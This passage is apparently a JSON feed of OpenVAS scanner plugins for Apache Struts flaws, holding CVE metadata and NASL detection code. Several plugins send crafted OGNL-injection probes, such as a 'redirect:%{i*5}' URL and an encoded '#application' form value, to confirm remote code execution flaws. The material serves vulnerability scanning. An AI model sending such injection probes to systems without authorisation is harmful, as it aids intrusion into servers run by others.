script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 16:37:50 +0200 (Fri, 10 Sep 2010)\");\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_name(\"Struts Remote Command Execution Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/14360/\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/2.2.1/docs/s2-005.html\");\n script_xref(name : \"URL\" , value : \"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n\n 
script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n exit(0);\n}\n\t\t\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\n## Get HTTP Port\nstPort = get_http_port(default:8080);\nif(!get_port_state(stPort)){\n exit(0);\n}\n\n## GET the version from KB\nstVer = get_kb_item(\"www/\" + stPort + \"/Apache/Struts\");\nstVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:stVer);\n\n## Check for the Struts version\nif(stVer[1] != NULL)\n{\n if(version_in_range(version:stVer[1], test_version:\"2.0\", test_version2:\"2.1.8.1\")){\n security_message(stPort);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:15", "description": "This host is running Apache Struts and is\n prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-06-07T00:00:00", "type": "openvas", "title": "Apache Struts Remote Code Execution vulnerability June16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785"], "modified": "2018-11-21T00:00:00", "id": "OPENVAS:1361412562310808067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808067", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_remote_code_exec_vuln_june.nasl 58255 2016-06-07 13:59:43 +0530 June$\n#\n# Apache Struts Remote Code Execution 
vulnerability June16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808067\");\n script_version(\"$Revision: 12455 $\");\n script_cve_id(\"CVE-2016-0785\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 10:17:27 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-07 13:59:43 +0530 (Tue, 07 Jun 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts Remote Code Execution vulnerability June16\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an improper validation\n of a non-spec URL-encoded parameter value including multi-byte characters.\");\n\n 
script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts Version 2.x through 2.3.24.1\n (except 2.3.20.3)\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts Version 2.3.20.3\n or 2.3.24.3 or 2.3.28 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/docs/s2-029.html\");\n\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"ApacheStruts/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!appVer = get_app_version(cpe:CPE, port:appPort)){\n exit(0);\n}\n##version 2.3.20.3 is not vulnerable\nif(version_is_equal(version:appVer, test_version:\"2.3.20.3\")){\n exit(0);\n}\n\n## Vulnerable version according to Advisory\nelse if(version_in_range(version:appVer, test_version:\"2.0.0\", test_version2:\"2.3.24.1\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"2.3.20.3 or 2.3.24.3 or 2.3.28\");\n security_message(data:report, port:appPort);\n exit(0);\n}\n\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0838"], "description": "This host is running Apache Struts Showcase\n and is prone to java method execution vulnerability.", "modified": "2019-02-14T00:00:00", "published": "2012-03-13T00:00:00", "id": "OPENVAS:1361412562310802425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802425", "type": "openvas", "title": "Apache Struts2 Showcase Arbitrary Java Method Execution 
vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_showcase_java_method_exec_vuln.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802425\");\n script_version(\"$Revision: 13659 $\");\n script_cve_id(\"CVE-2012-0838\");\n script_bugtraq_id(49728);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-13 14:59:53 +0530 (Tue, 13 Mar 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts Showcase\n and is prone to 
java method execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request and\n check whether it is able execute java methods or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper conversion\n in OGNL expression if a non string property is contained in action.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary java\n method. Further that results to disclose environment variables or cause a\n denial of service or an arbitrary OS command can be executed.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts2 (Showcase) version 2.x to 2.2.3\");\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts2 2.2.3.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://jvn.jp/en/jp/JVN79099262/index.html\");\n script_xref(name:\"URL\", value:\"https://issues.apache.org/jira/browse/WW-3668\");\n script_xref(name:\"URL\", value:\"http://jvndb.jvn.jp/en/contents/2012/JVNDB-2012-000012.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nuseragent = http_get_user_agent();\nhost = http_host_name(port:asport);\n\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\nif(!asres) exit(0);\n\nif(\">Showcase</\" >< asres && 
\">Struts Showcase<\" >< asres) {\n\n postdata = \"requiredValidatorField=&requiredStringValidatorField\" +\n \"=&integerValidatorField=%22%3C%27+%2B+%23application\" +\n \"+%2B+%27%3E%22&dateValidatorField=&emailValidatorFie\" +\n \"ld=&urlValidatorField=&stringLengthValidatorField=&r\" +\n \"egexValidatorField=&fieldExpressionValidatorField=\";\n\n url = dir + \"/validation/submitFieldValidatorsExamples.action\";\n\n asReq = string(\"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if( asRes && \".template.Configuration@\" >< asRes && \">Struts Showcase<\" >< asRes ) {\n security_message(port:asport);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0838"], "description": "This host is running Apache Struts Showcase\n and is prone to java method execution vulnerability.", "modified": "2017-04-03T00:00:00", "published": "2012-03-13T00:00:00", "id": "OPENVAS:802425", "href": "http://plugins.openvas.org/nasl.php?oid=802425", "type": "openvas", "title": "Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_showcase_java_method_exec_vuln.nasl 5841 2017-04-03 12:46:41Z cfi $\n#\n# Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(802425);\n script_version(\"$Revision: 5841 $\");\n script_cve_id(\"CVE-2012-0838\");\n script_bugtraq_id(49728);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-03 14:46:41 +0200 (Mon, 03 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-13 14:59:53 +0530 (Tue, 13 Mar 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts Showcase\n and is prone to java method execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted HTTP GET request and\n check whether it is able execute java methods or not.\");\n\n script_tag(name: \"insight\" , value:\"The flaw is due to an improper conversion\n in OGNL expression if a non string property is contained in action.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation could allow an attacker to execute arbitrary java\n method. 
Further that results to disclose environment variables or cause a\n denial of service or an arbitrary OS command can be executed.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts2 (Showcase) version 2.x to 2.2.3\");\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts2 2.2.3.1 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://jvn.jp/en/jp/JVN79099262/index.html\");\n script_xref(name : \"URL\" , value : \"https://issues.apache.org/jira/browse/WW-3668\");\n script_xref(name : \"URL\" , value : \"http://jvndb.jvn.jp/en/contents/2012/JVNDB-2012-000012.html\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nasport = 0;\nasreq = \"\";\nasres = \"\";\nasRes = \"\";\nasReq = \"\";\ndir = \"\";\nurl = \"\";\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nif(asreq)\n{\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(asres)\n {\n ## Confirm the application\n if(\">Showcase</\" >< asres && \">Struts Showcase<\" >< asres)\n {\n ## Construct the POST data\n postdata = \"requiredValidatorField=&requiredStringValidatorField\" +\n \"=&integerValidatorField=%22%3C%27+%2B+%23application\" +\n \"+%2B+%27%3E%22&dateValidatorField=&emailValidatorFie\" +\n 
\"ld=&urlValidatorField=&stringLengthValidatorField=&r\" +\n \"egexValidatorField=&fieldExpressionValidatorField=\";\n\n url = dir + \"/validation/submitFieldValidatorsExamples.action\";\n\n ## Construct the POST request\n asReq = string(\"POST \", url,\" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes)\n {\n ## Confirm the exploit\n if(!isnull(asRes) &&(\".template.Configuration@\" >< asRes) &&\n \">Struts Showcase<\" >< asRes)\n {\n security_message(asRes);\n exit(0);\n }\n }\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-15T13:08:51", "description": "This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.", "cvss3": {}, "published": "2013-07-24T00:00:00", "type": "openvas", "title": "Apache Struts2 Redirection and Security Bypass Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-01-11T00:00:00", "id": "OPENVAS:803838", "href": "http://plugins.openvas.org/nasl.php?oid=803838", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_mult_redirect_vuln.nasl 8373 2018-01-11 10:29:41Z cfischer $\n#\n# Apache Struts2 Redirection and Security Bypass Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free 
Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_id(803838);\n script_version(\"$Revision: 8373 $\");\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61196, 61189);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-11 11:29:41 +0100 (Thu, 11 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-24 11:58:54 +0530 (Wed, 24 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Redirection and Security Bypass Vulnerabilities\");\n\n script_tag(name: \"summary\" , value:\"This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send an expression along with the redirect command\n via HTTP GET request and check whether it is redirecting and solve the expression or not.\");\n\n script_tag(name: \"insight\" , value:\"Flaws are due to improper sanitation of 'action:',\n 'redirect:', and 'redirectAction:' prefixing parameters before being used in\n DefaultActionMapper.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote attacker\n to execute arbitrary arbitrary Java code via OGNL (Object-Graph Navigation Language)\n or redirect user to a malicious 
url.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Apache Struts 2.0.0 to 2.3.15\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Apache Struts 2 version 2.3.15.1 or later,\n For updates refer to http://struts.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/54118\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/fulldisclosure/2013/Jul/157\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-016.html\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/development/2.x/docs/s2-017.html\");\n script_xref(name : \"URL\" , value : \"http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Variable Initialization\nasport = 0;\nasreq = \"\";\nasres = \"\";\nres = \"\";\nreq = \"\";\nresult = \"\";\ndir = \"\";\nurl = \"\";\n\n## Get HTTP Port\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\n## Send and Receive the response\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\n## Confirm the application\nif(asres && \">Struts2 Showcase<\" >< asres && \">Welcome!<\" >< asres)\n{\n calc = make_list(2, 3);\n\n foreach i (calc)\n {\n ## Construct attack request\n url = dir + \"/showcase.action?redirect%3A%25%7B\"+ i +\"*5%7D\";\n\n req = http_get(item:url, port:asport);\n res = 
http_keepalive_send_recv(port:asport, data:req);\n\n if(res =~ \"HTTP/1.. 302\" && res =~ \"Location:.*/([0-9]+)?\")\n {\n result = eregmatch(pattern: string(dir, \"/([0-9]+)?\"), string:res);\n\n if ( !result || result[1] >!< i * 5 ) exit(0);\n }\n else exit(0);\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:04", "description": "This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.", "cvss3": {}, "published": "2013-07-24T00:00:00", "type": "openvas", "title": "Apache Struts2 Redirection and Security Bypass Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310803838", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803838", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts2_mult_redirect_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Apache Struts2 Redirection and Security Bypass Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803838\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61196, 61189);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-24 11:58:54 +0530 (Wed, 24 Jul 2013)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts2 Redirection and Security Bypass Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts2 and is prone\n to redirection and security bypass vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send an expression along with the redirect command\n via HTTP GET request and check whether it is redirecting and solve the expression or not.\");\n\n script_tag(name:\"insight\", value:\"Flaws are due to improper sanitation of 'action:',\n 'redirect:', and 'redirectAction:' prefixing parameters before being used in\n DefaultActionMapper.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker\n to execute arbitrary arbitrary Java code via OGNL (Object-Graph Navigation Language)\n or redirect user to a malicious url.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts 2.0.0 to 2.3.15\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts 2 version 2.3.15.1 or later.\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54118\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2013/Jul/157\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/development/2.x/docs/s2-016.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/development/2.x/docs/s2-017.html\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/release/2.3.x/docs/version-notes-23151.html\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nasreq = http_get(item:string(dir,\"/showcase.action\"), port:asport);\nasres = http_keepalive_send_recv(port:asport, data:asreq);\n\nif(asres && \">Struts2 Showcase<\" >< asres && \">Welcome!<\" >< asres)\n{\n calc = make_list(2, 3);\n\n foreach i (calc)\n {\n url = dir + \"/showcase.action?redirect%3A%25%7B\"+ i +\"*5%7D\";\n\n req = http_get(item:url, port:asport);\n res = http_keepalive_send_recv(port:asport, data:req);\n\n if(res =~ \"HTTP/1.. 
302\" && res =~ \"Location:.*/([0-9]+)?\")\n {\n result = eregmatch(pattern: string(dir, \"/([0-9]+)?\"), string:res);\n\n if ( !result || result[1] >!< i * 5 ) exit(0);\n }\n else exit(0);\n }\n security_message(port:asport);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "description": "This host is running Apache Struts and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-06-06T00:00:00", "type": "openvas", "title": "Apache Struts Multiple Vulnerabilities June16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2162", "CVE-2016-4003", "CVE-2016-3093"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310808021", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808021", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_mult_vuln_june16.nasl 58255 2016-06-06 11:03:24 +0530 June$\n#\n# Apache Struts Multiple Vulnerabilities June16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808021\");\n script_version(\"$Revision: 11969 $\");\n script_cve_id(\"CVE-2016-4003\", \"CVE-2016-2162\", \"CVE-2016-3093\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 16:53:42 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-06 11:03:24 +0530 (Mon, 06 Jun 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Apache Struts Multiple Vulnerabilities June16\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist:\n\n - The Apache Struts framework, when forced, performs double evaluation of\n attribute values assigned to certain tags, so it is possible to pass in\n a value that is evaluated again when the tag's attributes are rendered.\n\n - The interceptor does not validate user input and accepts an arbitrary\n string, which a developer may use to display the language selected by\n the user.\n\n - The application does not properly validate cache method references when used\n with OGNL before 3.0.12.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to inject arbitrary web script or HTML via multi-byte 
